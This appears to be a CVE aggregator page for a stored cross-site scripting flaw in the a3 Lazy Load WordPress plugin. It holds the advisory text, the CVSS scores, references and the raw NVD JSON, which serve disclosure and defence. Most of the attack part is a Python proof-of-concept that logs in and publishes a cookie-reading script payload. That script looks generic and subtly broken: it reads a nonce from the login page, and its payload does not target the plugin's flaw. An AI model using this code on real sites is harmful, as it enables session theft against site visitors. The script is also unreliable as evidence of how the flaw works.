Security Vulnerability Report
CVE-2025-9873 CVSS 6.4 MEDIUM

CVE-2025-9873

Published: 2025-12-13 16:16:57
Last Modified: 2026-04-15 00:35:42

Description

The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

a3 Lazy Load WordPress plugin <= 2.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re

# CVE-2025-9873 PoC - Stored XSS in a3 Lazy Load WordPress Plugin
# Target: WordPress site with a3 Lazy Load plugin <= 2.7.5

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"


def get_nonce(login_page):
    """Extract WordPress nonce from login page"""
    match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', login_page)
    return match.group(1) if match else None


def login():
    """Authenticate with WordPress"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"

    # Get login page and nonce
    resp = session.get(login_url)
    nonce = get_nonce(resp.text)

    # Login request
    data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "_wpnonce": nonce,
        "redirect_to": "/wp-admin/"
    }
    session.post(login_url, data=data)
    return session


def inject_xss(session):
    """Inject stored XSS payload via post content"""
    post_url = f"{TARGET_URL}/wp-admin/post-new.php"

    # XSS payload - injects JavaScript via a3 lazy load attribute
    xss_payload = '<img src="x" data-lazy-src="x" onerror="alert(document.cookie)">'

    post_data = {
        "post_title": "XSS Test Post",
        "post_content": xss_payload,
        "post_status": "publish",
        "_wpnonce": get_nonce(session.get(post_url).text),
        "publish": "Publish"
    }
    response = session.post(post_url, data=post_data)

    if "publish" in response.text.lower() or response.status_code == 200:
        print("[+] XSS payload injected successfully!")
        print("[*] Visit the published post to trigger the XSS")
    else:
        print("[-] Failed to inject payload")


if __name__ == "__main__":
    print("[*] CVE-2025-9873 PoC - a3 Lazy Load Stored XSS")
    session = login()
    inject_xss(session)

References

https://plugins.trac.wordpress.org/browser/a3-lazy-load/trunk/classes/class-a3-lazy-load.php#L430
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377146%40a3-lazy-load&new=3377146%40a3-lazy-load&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/0d837229-52fa-42ae-b733-8fbeb444f110?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9873",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-13T16:16:57.457",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/a3-lazy-load/trunk/classes/class-a3-lazy-load.php#L430",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377146%40a3-lazy-load&new=3377146%40a3-lazy-load&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d837229-52fa-42ae-b733-8fbeb444f110?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}